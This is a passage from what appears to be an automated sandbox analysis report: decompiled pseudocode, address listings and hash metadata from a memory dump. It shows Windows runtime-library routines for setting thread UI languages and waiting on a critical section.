                                  						asm("int3");
                                  						asm("int3");
                                  						asm("int3");
                                  						asm("int3");
                                  						asm("int3");
                                  						asm("int3");
                                  						asm("int3");
                                  						asm("int3");
                                  						asm("int3");
                                  						asm("int3");
                                  						asm("int3");
                                  						asm("int3");
                                  						asm("int3");
                                  						asm("int3");
                                  						asm("int3");
                                  						_push(0x3517b60);
                                  						_t170 = _v8;
                                  						_v28 = 0;
                                  						_v40 = 0;
                                  						_v24 = 0;
                                  						_v17 = 0;
                                  						_v32 = 0;
                                  						__eflags = _t170 & 0xffff7cf2;
                                  						if((_t170 & 0xffff7cf2) != 0) {
                                  							L43:
                                  							_t77 = 0xc000000d;
                                  						} else {
                                  							_t79 = _t170 & 0x0000000c;
                                  							__eflags = _t79;
                                  							if(_t79 != 0) {
                                  								__eflags = _t79 - 0xc;
                                  								if(_t79 == 0xc) {
                                  									goto L43;
                                  								} else {
                                  									goto L9;
                                  								}
                                  							} else {
                                  								_t170 = _t170 | 0x00000008;
                                  								__eflags = _t170;
                                  								L9:
                                  								_t81 = _t170 & 0x00000300;
                                  								__eflags = _t81 - 0x300;
                                  								if(_t81 == 0x300) {
                                  									goto L43;
                                  								} else {
                                  									_t138 = _t170 & 0x00000001;
                                  									__eflags = _t138;
                                  									_v24 = _t138;
                                  									if(_t138 != 0) {
                                  										__eflags = _t81;
                                  										if(_t81 != 0) {
                                  											goto L43;
                                  										} else {
                                  											goto L11;
                                  										}
                                  									} else {
                                  										L11:
                                  										_push(_t129);
                                  										_t77 = E03436D90( &_v20);
                                  										_t130 = _t77;
                                  										__eflags = _t130;
                                  										if(_t130 >= 0) {
                                  											_push(_t174);
                                  											__eflags = _t170 & 0x00000301;
                                  											if((_t170 & 0x00000301) == 0) {
                                  												_t176 = _a8;
                                  												__eflags = _t176;
                                  												if(__eflags == 0) {
                                  													L64:
                                  													_t83 =  *[fs:0x18];
                                  													_t177 = 0;
                                  													__eflags =  *(_t83 + 0xfb8);
                                  													if( *(_t83 + 0xfb8) != 0) {
                                  														E034376E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                  														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                  													}
                                  													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                  													goto L15;
                                  												} else {
                                  													asm("sbb edx, edx");
                                  													_t114 = E034C8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                  													__eflags = _t114;
                                  													if(_t114 < 0) {
                                  														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                  														E0342B150();
                                  													}
                                  													_t116 = E034C6D81(_t176,  &_v16);
                                  													__eflags = _t116;
                                  													if(_t116 >= 0) {
                                  														__eflags = _v16 - 2;
                                  														if(_v16 < 2) {
                                  															L56:
                                  															_t118 = E034375CE(_v20, 5, 0);
                                  															__eflags = _t118;
                                  															if(_t118 < 0) {
                                  																L67:
                                  																_t130 = 0xc0000017;
                                  																goto L32;
                                  															} else {
                                  																__eflags = _v12;
                                  																if(_v12 == 0) {
                                  																	goto L67;
                                  																} else {
                                  																	_t153 =  *0x3518638; // 0x0
                                  																	_t122 = L034338A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                  																	_t154 = _v12;
                                  																	_t130 = _t122;
                                  																	__eflags = _t130;
                                  																	if(_t130 >= 0) {
                                  																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                  																		__eflags = _t123;
                                  																		if(_t123 != 0) {
                                  																			_t155 = _a12;
                                  																			__eflags = _t155;
                                  																			if(_t155 != 0) {
                                  																				 *_t155 = _t123;
                                  																			}
                                  																			goto L64;
                                  																		} else {
                                  																			E034376E2(_t154);
                                  																			goto L41;
                                  																		}
                                  																	} else {
                                  																		E034376E2(_t154);
                                  																		_t177 = 0;
                                  																		goto L18;
                                  																	}
                                  																}
                                  															}
                                  														} else {
                                  															__eflags =  *_t176;
                                  															if( *_t176 != 0) {
                                  																goto L56;
                                  															} else {
                                  																__eflags =  *(_t176 + 2);
                                  																if( *(_t176 + 2) == 0) {
                                  																	goto L64;
                                  																} else {
                                  																	goto L56;
                                  																}
                                  															}
                                  														}
                                  													} else {
                                  														_t130 = 0xc000000d;
                                  														goto L32;
                                  													}
                                  												}
                                  												goto L35;
                                  											} else {
                                  												__eflags = _a8;
                                  												if(_a8 != 0) {
                                  													_t77 = 0xc000000d;
                                  												} else {
                                  													_v5 = 1;
                                  													L0345FCE3(_v20, _t170);
                                  													_t177 = 0;
                                  													__eflags = 0;
                                  													L15:
                                  													_t85 =  *[fs:0x18];
                                  													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                  													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                  														L18:
                                  														__eflags = _t130;
                                  														if(_t130 != 0) {
                                  															goto L32;
                                  														} else {
                                  															__eflags = _v5 - _t130;
                                  															if(_v5 == _t130) {
                                  																goto L32;
                                  															} else {
                                  																_t86 =  *[fs:0x18];
                                  																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                  																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                  																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                  																}
                                  																__eflags = _t177;
                                  																if(_t177 == 0) {
                                  																	L31:
                                  																	__eflags = 0;
                                  																	L034370F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                  																	goto L32;
                                  																} else {
                                  																	__eflags = _v24;
                                  																	_t91 =  *(_t177 + 0x20);
                                  																	if(_v24 != 0) {
                                  																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                  																		goto L31;
                                  																	} else {
                                  																		_t141 = _t91 & 0x00000040;
                                  																		__eflags = _t170 & 0x00000100;
                                  																		if((_t170 & 0x00000100) == 0) {
                                  																			__eflags = _t141;
                                  																			if(_t141 == 0) {
                                  																				L74:
                                  																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                  																				goto L27;
                                  																			} else {
                                  																				_t177 = E0345FD22(_t177);
                                  																				__eflags = _t177;
                                  																				if(_t177 == 0) {
                                  																					goto L42;
                                  																				} else {
                                  																					_t130 = E0345FD9B(_t177, 0, 4);
                                  																					__eflags = _t130;
                                  																					if(_t130 != 0) {
                                  																						goto L42;
                                  																					} else {
                                  																						_t68 = _t177 + 0x20;
                                  																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                  																						__eflags =  *_t68;
                                  																						_t91 =  *(_t177 + 0x20);
                                  																						goto L74;
                                  																					}
                                  																				}
                                  																			}
                                  																			goto L35;
                                  																		} else {
                                  																			__eflags = _t141;
                                  																			if(_t141 != 0) {
                                  																				_t177 = E0345FD22(_t177);
                                  																				__eflags = _t177;
                                  																				if(_t177 == 0) {
                                  																					L42:
                                  																					_t77 = 0xc0000001;
                                  																					goto L33;
                                  																				} else {
                                  																					_t130 = E0345FD9B(_t177, 0, 4);
                                  																					__eflags = _t130;
                                  																					if(_t130 != 0) {
                                  																						goto L42;
                                  																					} else {
                                  																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                  																						_t91 =  *(_t177 + 0x20);
                                  																						goto L26;
                                  																					}
                                  																				}
                                  																				goto L35;
                                  																			} else {
                                  																				L26:
                                  																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                  																				__eflags = _t94;
                                  																				L27:
                                  																				 *(_t177 + 0x20) = _t94;
                                  																				__eflags = _t170 & 0x00008000;
                                  																				if((_t170 & 0x00008000) != 0) {
                                  																					_t95 = _a12;
                                  																					__eflags = _t95;
                                  																					if(_t95 != 0) {
                                  																						_t96 =  *_t95;
                                  																						__eflags = _t96;
                                  																						if(_t96 != 0) {
                                  																							 *((short*)(_t177 + 0x22)) = 0;
                                  																							_t40 = _t177 + 0x20;
                                  																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                  																							__eflags =  *_t40;
                                  																						}
                                  																					}
                                  																				}
                                  																				goto L31;
                                  																			}
                                  																		}
                                  																	}
                                  																}
                                  															}
                                  														}
                                  													} else {
                                  														_t147 =  *( *[fs:0x18] + 0xfc0);
                                  														_t106 =  *(_t147 + 0x20);
                                  														__eflags = _t106 & 0x00000040;
                                  														if((_t106 & 0x00000040) != 0) {
                                  															_t147 = E0345FD22(_t147);
                                  															__eflags = _t147;
                                  															if(_t147 == 0) {
                                  																L41:
                                  																_t130 = 0xc0000001;
                                  																L32:
                                  																_t77 = _t130;
                                  																goto L33;
                                  															} else {
                                  																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                  																_t106 =  *(_t147 + 0x20);
                                  																goto L17;
                                  															}
                                  															goto L35;
                                  														} else {
                                  															L17:
                                  															_t108 = _t106 | 0x00000080;
                                  															__eflags = _t108;
                                  															 *(_t147 + 0x20) = _t108;
                                  															 *( *[fs:0x18] + 0xfc0) = _t147;
                                  															goto L18;
                                  														}
                                  													}
                                  												}
                                  											}
                                  											L33:
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  						L35:
                                  						return _t77;
                                  					} else {
                                  						 *_t75 = 0x3517b80;
                                  						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                  						 *_t134 = _t75;
                                  						 *0x3517b84 = _t75;
                                  						_t73 = E0343EB70(_t134, 0x3517b60);
                                  						if( *0x3517b20 != 0) {
                                  							_t73 =  *( *[fs:0x30] + 0xc);
                                  							if( *((char*)(_t73 + 0x28)) == 0) {
                                  								_t73 = E0343FF60( *0x3517b20);
                                  							}
                                  						}
                                  						goto L5;
                                  					}
                                  				}
                                  			}

















































                                  0x0345fab0
                                  0x0345fab2
                                  0x0345fab3
                                  0x0345fab4
                                  0x0345fabc
                                  0x0345fac0
                                  0x0345fb14
                                  0x0345fb17
                                  0x0345fac2
                                  0x0345fac8
                                  0x0345facd
                                  0x0345fad3
                                  0x0345fad3
                                  0x0345fadd
                                  0x0345fb18
                                  0x0345fb1b
                                  0x0345fb1d
                                  0x0345fb1e
                                  0x0345fb1f
                                  0x0345fb20
                                  0x0345fb21
                                  0x0345fb22
                                  0x0345fb23
                                  0x0345fb24
                                  0x0345fb25
                                  0x0345fb26
                                  0x0345fb27
                                  0x0345fb28
                                  0x0345fb29
                                  0x0345fb2a
                                  0x0345fb2b
                                  0x0345fb2c
                                  0x0345fb2d
                                  0x0345fb2e
                                  0x0345fb2f
                                  0x0345fb3a
                                  0x0345fb3b
                                  0x0345fb3e
                                  0x0345fb41
                                  0x0345fb44
                                  0x0345fb47
                                  0x0345fb4a
                                  0x0345fb4d
                                  0x0345fb53
                                  0x0349bdcb
                                  0x0349bdcb
                                  0x0345fb59
                                  0x0345fb5b
                                  0x0345fb5b
                                  0x0345fb5e
                                  0x0349bdd5
                                  0x0349bdd8
                                  0x00000000
                                  0x0349bdda
                                  0x00000000
                                  0x0349bdda
                                  0x0345fb64
                                  0x0345fb64
                                  0x0345fb64
                                  0x0345fb67
                                  0x0345fb6e
                                  0x0345fb70
                                  0x0345fb72
                                  0x00000000
                                  0x0345fb78
                                  0x0345fb7a
                                  0x0345fb7a
                                  0x0345fb7d
                                  0x0345fb80
                                  0x0349bddf
                                  0x0349bde1
                                  0x00000000
                                  0x0349bde3
                                  0x00000000
                                  0x0349bde3
                                  0x0345fb86
                                  0x0345fb86
                                  0x0345fb86
                                  0x0345fb8b
                                  0x0345fb90
                                  0x0345fb92
                                  0x0345fb94
                                  0x0345fb9a
                                  0x0345fb9b
                                  0x0345fba1
                                  0x0349bde8
                                  0x0349bdeb
                                  0x0349bded
                                  0x0349beb5
                                  0x0349beb5
                                  0x0349bebb
                                  0x0349bebd
                                  0x0349bec3
                                  0x0349bed2
                                  0x0349bedd
                                  0x0349bedd
                                  0x0349beed
                                  0x00000000
                                  0x0349bdf3
                                  0x0349bdfe
                                  0x0349be06
                                  0x0349be0b
                                  0x0349be0d
                                  0x0349be0f
                                  0x0349be14
                                  0x0349be19
                                  0x0349be20
                                  0x0349be25
                                  0x0349be27
                                  0x0349be35
                                  0x0349be39
                                  0x0349be46
                                  0x0349be4f
                                  0x0349be54
                                  0x0349be56
                                  0x0349bef8
                                  0x0349bef8
                                  0x00000000
                                  0x0349be5c
                                  0x0349be5c
                                  0x0349be60
                                  0x00000000
                                  0x0349be66
                                  0x0349be66
                                  0x0349be7f
                                  0x0349be84
                                  0x0349be87
                                  0x0349be89
                                  0x0349be8b
                                  0x0349be99
                                  0x0349be9d
                                  0x0349bea0
                                  0x0349beac
                                  0x0349beaf
                                  0x0349beb1
                                  0x0349beb3
                                  0x0349beb3
                                  0x00000000
                                  0x0349bea2
                                  0x0349bea2
                                  0x00000000
                                  0x0349bea2
                                  0x0349be8d
                                  0x0349be8d
                                  0x0349be92
                                  0x00000000
                                  0x0349be92
                                  0x0349be8b
                                  0x0349be60
                                  0x0349be3b
                                  0x0349be3b
                                  0x0349be3e
                                  0x00000000
                                  0x0349be40
                                  0x0349be40
                                  0x0349be44
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0349be44
                                  0x0349be3e
                                  0x0349be29
                                  0x0349be29
                                  0x00000000
                                  0x0349be29
                                  0x0349be27
                                  0x00000000
                                  0x0345fba7
                                  0x0345fba7
                                  0x0345fbab
                                  0x0349bf02
                                  0x0345fbb1
                                  0x0345fbb1
                                  0x0345fbb8
                                  0x0345fbbd
                                  0x0345fbbd
                                  0x0345fbbf
                                  0x0345fbbf
                                  0x0345fbc5
                                  0x0345fbcb
                                  0x0345fbf8
                                  0x0345fbf8
                                  0x0345fbfa
                                  0x00000000
                                  0x0345fc00
                                  0x0345fc00
                                  0x0345fc03
                                  0x00000000
                                  0x0345fc09
                                  0x0345fc09
                                  0x0345fc0f
                                  0x0345fc15
                                  0x0345fc23
                                  0x0345fc23
                                  0x0345fc25
                                  0x0345fc27
                                  0x0345fc75
                                  0x0345fc7c
                                  0x0345fc84
                                  0x00000000
                                  0x0345fc29
                                  0x0345fc29
                                  0x0345fc2d
                                  0x0345fc30
                                  0x0349bf0f
                                  0x00000000
                                  0x0345fc36
                                  0x0345fc38
                                  0x0345fc3b
                                  0x0345fc41
                                  0x0349bf17
                                  0x0349bf19
                                  0x0349bf48
                                  0x0349bf4b
                                  0x00000000
                                  0x0349bf1b
                                  0x0349bf22
                                  0x0349bf24
                                  0x0349bf26
                                  0x00000000
                                  0x0349bf2c
                                  0x0349bf37
                                  0x0349bf39
                                  0x0349bf3b
                                  0x00000000
                                  0x0349bf41
                                  0x0349bf41
                                  0x0349bf41
                                  0x0349bf41
                                  0x0349bf45
                                  0x00000000
                                  0x0349bf45
                                  0x0349bf3b
                                  0x0349bf26
                                  0x00000000
                                  0x0345fc47
                                  0x0345fc47
                                  0x0345fc49
                                  0x0345fcb2
                                  0x0345fcb4
                                  0x0345fcb6
                                  0x0345fcdc
                                  0x0345fcdc
                                  0x00000000
                                  0x0345fcb8
                                  0x0345fcc3
                                  0x0345fcc5
                                  0x0345fcc7
                                  0x00000000
                                  0x0345fcc9
                                  0x0345fcc9
                                  0x0345fccd
                                  0x00000000
                                  0x0345fccd
                                  0x0345fcc7
                                  0x00000000
                                  0x0345fc4b
                                  0x0345fc4b
                                  0x0345fc4e
                                  0x0345fc4e
                                  0x0345fc51
                                  0x0345fc51
                                  0x0345fc54
                                  0x0345fc5a
                                  0x0345fc5c
                                  0x0345fc5f
                                  0x0345fc61
                                  0x0345fc63
                                  0x0345fc65
                                  0x0345fc67
                                  0x0345fc6e
                                  0x0345fc72
                                  0x0345fc72
                                  0x0345fc72
                                  0x0345fc72
                                  0x0345fc67
                                  0x0345fc61
                                  0x00000000
                                  0x0345fc5a
                                  0x0345fc49
                                  0x0345fc41
                                  0x0345fc30
                                  0x0345fc27
                                  0x0345fc03
                                  0x0345fbcd
                                  0x0345fbd3
                                  0x0345fbd9
                                  0x0345fbdc
                                  0x0345fbde
                                  0x0345fc99
                                  0x0345fc9b
                                  0x0345fc9d
                                  0x0345fcd5
                                  0x0345fcd5
                                  0x0345fc89
                                  0x0345fc89
                                  0x00000000
                                  0x0345fc9f
                                  0x0345fc9f
                                  0x0345fca3
                                  0x00000000
                                  0x0345fca3
                                  0x00000000
                                  0x0345fbe4
                                  0x0345fbe4
                                  0x0345fbe4
                                  0x0345fbe4
                                  0x0345fbe9
                                  0x0345fbf2
                                  0x00000000
                                  0x0345fbf2
                                  0x0345fbde
                                  0x0345fbcb
                                  0x0345fbab
                                  0x0345fc8b
                                  0x0345fc8b
                                  0x0345fc8c
                                  0x0345fb80
                                  0x0345fb72
                                  0x0345fb5e
                                  0x0345fc8d
                                  0x0345fc91
                                  0x0345fadf
                                  0x0345fadf
                                  0x0345fae1
                                  0x0345fae4
                                  0x0345fae7
                                  0x0345faec
                                  0x0345faf8
                                  0x0345fb00
                                  0x0345fb07
                                  0x0345fb0f
                                  0x0345fb0f
                                  0x0345fb07
                                  0x00000000
                                  0x0345faf8
                                  0x0345fadd

                                  Strings
                                  • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0349BE0F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                  • API String ID: 0-865735534
                                  • Opcode ID: 7bcf3ac5768de2492debe8ca4ba6336e4392c219c186ad626967623247a87877
                                  • Instruction ID: 0167d6fc5faca1c276f6fe3d3a0992a7548a0b21fe6ee2595facba7a34c6beb1
                                  • Opcode Fuzzy Hash: 7bcf3ac5768de2492debe8ca4ba6336e4392c219c186ad626967623247a87877
                                  • Instruction Fuzzy Hash: 11A1EF75E00605CFEB26DB69C450B6AB7A9FB48610F08457FEC46CF791DB30D84A8B89
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 63%
                                  			E03422D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                  				signed char _v8;
                                  				signed int _v12;
                                  				signed int _v16;
                                  				signed int _v20;
                                  				signed int _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				signed int _v52;
                                  				void* __esi;
                                  				void* __ebp;
                                  				intOrPtr _t55;
                                  				signed int _t57;
                                  				signed int _t58;
                                  				char* _t62;
                                  				signed char* _t63;
                                  				signed char* _t64;
                                  				signed int _t67;
                                  				signed int _t72;
                                  				signed int _t77;
                                  				signed int _t78;
                                  				signed int _t88;
                                  				intOrPtr _t89;
                                  				signed char _t93;
                                  				signed int _t97;
                                  				signed int _t98;
                                  				signed int _t102;
                                  				signed int _t103;
                                  				intOrPtr _t104;
                                  				signed int _t105;
                                  				signed int _t106;
                                  				signed char _t109;
                                  				signed int _t111;
                                  				void* _t116;
                                  
                                  				_t102 = __edi;
                                  				_t97 = __edx;
                                  				_v12 = _v12 & 0x00000000;
                                  				_t55 =  *[fs:0x18];
                                  				_t109 = __ecx;
                                  				_v8 = __edx;
                                  				_t86 = 0;
                                  				_v32 = _t55;
                                  				_v24 = 0;
                                  				_push(__edi);
                                  				if(__ecx == 0x3515350) {
                                  					_t86 = 1;
                                  					_v24 = 1;
                                  					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                  				}
                                  				_t103 = _t102 | 0xffffffff;
                                  				if( *0x3517bc8 != 0) {
                                  					_push(0xc000004b);
                                  					_push(_t103);
                                  					E034697C0();
                                  				}
                                  				if( *0x35179c4 != 0) {
                                  					_t57 = 0;
                                  				} else {
                                  					_t57 = 0x35179c8;
                                  				}
                                  				_v16 = _t57;
                                  				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                  					_t93 = _t109;
                                  					L23();
                                  				}
                                  				_t58 =  *_t109;
                                  				if(_t58 == _t103) {
                                  					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                  					_t58 = _t103;
                                  					if(__eflags == 0) {
                                  						_t93 = _t109;
                                  						E03451624(_t86, __eflags);
                                  						_t58 =  *_t109;
                                  					}
                                  				}
                                  				_v20 = _v20 & 0x00000000;
                                  				if(_t58 != _t103) {
                                  					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                  				}
                                  				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                  				_t88 = _v16;
                                  				_v28 = _t104;
                                  				L9:
                                  				while(1) {
                                  					if(E03447D50() != 0) {
                                  						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                  					} else {
                                  						_t62 = 0x7ffe0382;
                                  					}
                                  					if( *_t62 != 0) {
                                  						_t63 =  *[fs:0x30];
                                  						__eflags = _t63[0x240] & 0x00000002;
                                  						if((_t63[0x240] & 0x00000002) != 0) {
                                  							_t93 = _t109;
                                  							E034BFE87(_t93);
                                  						}
                                  					}
                                  					if(_t104 != 0xffffffff) {
                                  						_push(_t88);
                                  						_push(0);
                                  						_push(_t104);
                                  						_t64 = E03469520();
                                  						goto L15;
                                  					} else {
                                  						while(1) {
                                  							_t97 =  &_v8;
                                  							_t64 = E0345E18B(_t109 + 4, _t97, 4, _t88, 0);
                                  							if(_t64 == 0x102) {
                                  								break;
                                  							}
                                  							_t93 =  *(_t109 + 4);
                                  							_v8 = _t93;
                                  							if((_t93 & 0x00000002) != 0) {
                                  								continue;
                                  							}
                                  							L15:
                                  							if(_t64 == 0x102) {
                                  								break;
                                  							}
                                  							_t89 = _v24;
                                  							if(_t64 < 0) {
                                  								L0347DF30(_t93, _t97, _t64);
                                  								_push(_t93);
                                  								_t98 = _t97 | 0xffffffff;
                                  								__eflags =  *0x3516901;
                                  								_push(_t109);
                                  								_v52 = _t98;
                                  								if( *0x3516901 != 0) {
                                  									_push(0);
                                  									_push(1);
                                  									_push(0);
                                  									_push(0x100003);
                                  									_push( &_v12);
                                  									_t72 = E03469980();
                                  									__eflags = _t72;
                                  									if(_t72 < 0) {
                                  										_v12 = _t98 | 0xffffffff;
                                  									}
                                  								}
                                  								asm("lock cmpxchg [ecx], edx");
                                  								_t111 = 0;
                                  								__eflags = 0;
                                  								if(0 != 0) {
                                  									__eflags = _v12 - 0xffffffff;
                                  									if(_v12 != 0xffffffff) {
                                  										_push(_v12);
                                  										E034695D0();
                                  									}
                                  								} else {
                                  									_t111 = _v12;
                                  								}
                                  								return _t111;
                                  							} else {
                                  								if(_t89 != 0) {
                                  									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                  									_t77 = E03447D50();
                                  									__eflags = _t77;
                                  									if(_t77 == 0) {
                                  										_t64 = 0x7ffe0384;
                                  									} else {
                                  										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                  									}
                                  									__eflags =  *_t64;
                                  									if( *_t64 != 0) {
                                  										_t64 =  *[fs:0x30];
                                  										__eflags = _t64[0x240] & 0x00000004;
                                  										if((_t64[0x240] & 0x00000004) != 0) {
                                  											_t78 = E03447D50();
                                  											__eflags = _t78;
                                  											if(_t78 == 0) {
                                  												_t64 = 0x7ffe0385;
                                  											} else {
                                  												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                  											}
                                  											__eflags =  *_t64 & 0x00000020;
                                  											if(( *_t64 & 0x00000020) != 0) {
                                  												_t64 = E034A7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                  											}
                                  										}
                                  									}
                                  								}
                                  								return _t64;
                                  							}
                                  						}
                                  						_t97 = _t88;
                                  						_t93 = _t109;
                                  						E034BFDDA(_t97, _v12);
                                  						_t105 =  *_t109;
                                  						_t67 = _v12 + 1;
                                  						_v12 = _t67;
                                  						__eflags = _t105 - 0xffffffff;
                                  						if(_t105 == 0xffffffff) {
                                  							_t106 = 0;
                                  							__eflags = 0;
                                  						} else {
                                  							_t106 =  *(_t105 + 0x14);
                                  						}
                                  						__eflags = _t67 - 2;
                                  						if(_t67 > 2) {
                                  							__eflags = _t109 - 0x3515350;
                                  							if(_t109 != 0x3515350) {
                                  								__eflags = _t106 - _v20;
                                  								if(__eflags == 0) {
                                  									_t93 = _t109;
                                  									E034BFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                  								}
                                  							}
                                  						}
                                  						_push("RTL: Re-Waiting\n");
                                  						_push(0);
                                  						_push(0x65);
                                  						_v20 = _t106;
                                  						E034B5720();
                                  						_t104 = _v28;
                                  						_t116 = _t116 + 0xc;
                                  						continue;
                                  					}
                                  				}
                                  			}




































                                  0x03422d8a
                                  0x03422d8a
                                  0x03422d92
                                  0x03422d96
                                  0x03422d9e
                                  0x03422da0
                                  0x03422da3
                                  0x03422da5
                                  0x03422da8
                                  0x03422dab
                                  0x03422db2
                                  0x0347f9aa
                                  0x0347f9ab
                                  0x0347f9ae
                                  0x0347f9ae
                                  0x03422db8
                                  0x03422dc2
                                  0x0347f9b9
                                  0x0347f9be
                                  0x0347f9bf
                                  0x0347f9bf
                                  0x03422dcf
                                  0x0347f9c9
                                  0x03422dd5
                                  0x03422dd5
                                  0x03422dd5
                                  0x03422dde
                                  0x03422de1
                                  0x03422e70
                                  0x03422e72
                                  0x03422e72
                                  0x03422de7
                                  0x03422deb
                                  0x03422e7c
                                  0x03422e83
                                  0x03422e85
                                  0x03422e8b
                                  0x03422e8d
                                  0x03422e92
                                  0x03422e92
                                  0x03422e85
                                  0x03422df1
                                  0x03422df7
                                  0x03422df9
                                  0x03422df9
                                  0x03422dfc
                                  0x03422dff
                                  0x03422e02
                                  0x00000000
                                  0x03422e05
                                  0x03422e0c
                                  0x0347f9d9
                                  0x03422e12
                                  0x03422e12
                                  0x03422e12
                                  0x03422e1a
                                  0x0347f9e3
                                  0x0347f9e9
                                  0x0347f9f0
                                  0x0347f9f6
                                  0x0347f9f8
                                  0x0347f9f8
                                  0x0347f9f0
                                  0x03422e23
                                  0x0347fa02
                                  0x0347fa03
                                  0x0347fa05
                                  0x0347fa06
                                  0x00000000
                                  0x03422e29
                                  0x03422e29
                                  0x03422e2e
                                  0x03422e34
                                  0x03422e3e
                                  0x00000000
                                  0x00000000
                                  0x03422e44
                                  0x03422e47
                                  0x03422e4d
                                  0x00000000
                                  0x00000000
                                  0x03422e4f
                                  0x03422e54
                                  0x00000000
                                  0x00000000
                                  0x03422e5a
                                  0x03422e5f
                                  0x03422e9a
                                  0x03422ea4
                                  0x03422ea5
                                  0x03422ea8
                                  0x03422eaf
                                  0x03422eb2
                                  0x03422eb5
                                  0x0347fae9
                                  0x0347faeb
                                  0x0347faed
                                  0x0347faef
                                  0x0347faf7
                                  0x0347faf8
                                  0x0347fafd
                                  0x0347faff
                                  0x0347fb04
                                  0x0347fb04
                                  0x0347faff
                                  0x03422ec0
                                  0x03422ec4
                                  0x03422ec6
                                  0x03422ec8
                                  0x0347fb14
                                  0x0347fb18
                                  0x0347fb1e
                                  0x0347fb21
                                  0x0347fb21
                                  0x03422ece
                                  0x03422ece
                                  0x03422ece
                                  0x03422ed7
                                  0x03422e61
                                  0x03422e63
                                  0x0347fa6b
                                  0x0347fa71
                                  0x0347fa76
                                  0x0347fa78
                                  0x0347fa8a
                                  0x0347fa7a
                                  0x0347fa83
                                  0x0347fa83
                                  0x0347fa8f
                                  0x0347fa91
                                  0x0347fa97
                                  0x0347fa9d
                                  0x0347faa4
                                  0x0347faaa
                                  0x0347faaf
                                  0x0347fab1
                                  0x0347fac3
                                  0x0347fab3
                                  0x0347fabc
                                  0x0347fabc
                                  0x0347fac8
                                  0x0347facb
                                  0x0347fadf
                                  0x0347fadf
                                  0x0347facb
                                  0x0347faa4
                                  0x0347fa91
                                  0x03422e6f
                                  0x03422e6f
                                  0x03422e5f
                                  0x0347fa13
                                  0x0347fa15
                                  0x0347fa17
                                  0x0347fa1f
                                  0x0347fa21
                                  0x0347fa22
                                  0x0347fa25
                                  0x0347fa28
                                  0x0347fa2f
                                  0x0347fa2f
                                  0x0347fa2a
                                  0x0347fa2a
                                  0x0347fa2a
                                  0x0347fa31
                                  0x0347fa34
                                  0x0347fa36
                                  0x0347fa3c
                                  0x0347fa3e
                                  0x0347fa41
                                  0x0347fa43
                                  0x0347fa45
                                  0x0347fa45
                                  0x0347fa41
                                  0x0347fa3c
                                  0x0347fa4a
                                  0x0347fa4f
                                  0x0347fa51
                                  0x0347fa53
                                  0x0347fa56
                                  0x0347fa5b
                                  0x0347fa5e
                                  0x00000000
                                  0x0347fa5e
                                  0x03422e23

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Re-Waiting
                                  • API String ID: 0-316354757
                                  • Opcode ID: 3309ec1ae5bf73443a48b994507510a257014f21d8ce6c99822b20f8eb32aa2e
                                  • Instruction ID: 20ff9a17195736d381f5e074ea336cd71eb62d463374dba4bdd8bd90c11038f5
                                  • Opcode Fuzzy Hash: 3309ec1ae5bf73443a48b994507510a257014f21d8ce6c99822b20f8eb32aa2e
                                  • Instruction Fuzzy Hash: A061F571A006149FDB31DF68C840BBFBBA5EB44710F580AABD421AF3D0D7B49906D799
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 80%
                                  			E034F0EA5(void* __ecx, void* __edx) {
                                  				signed int _v20;
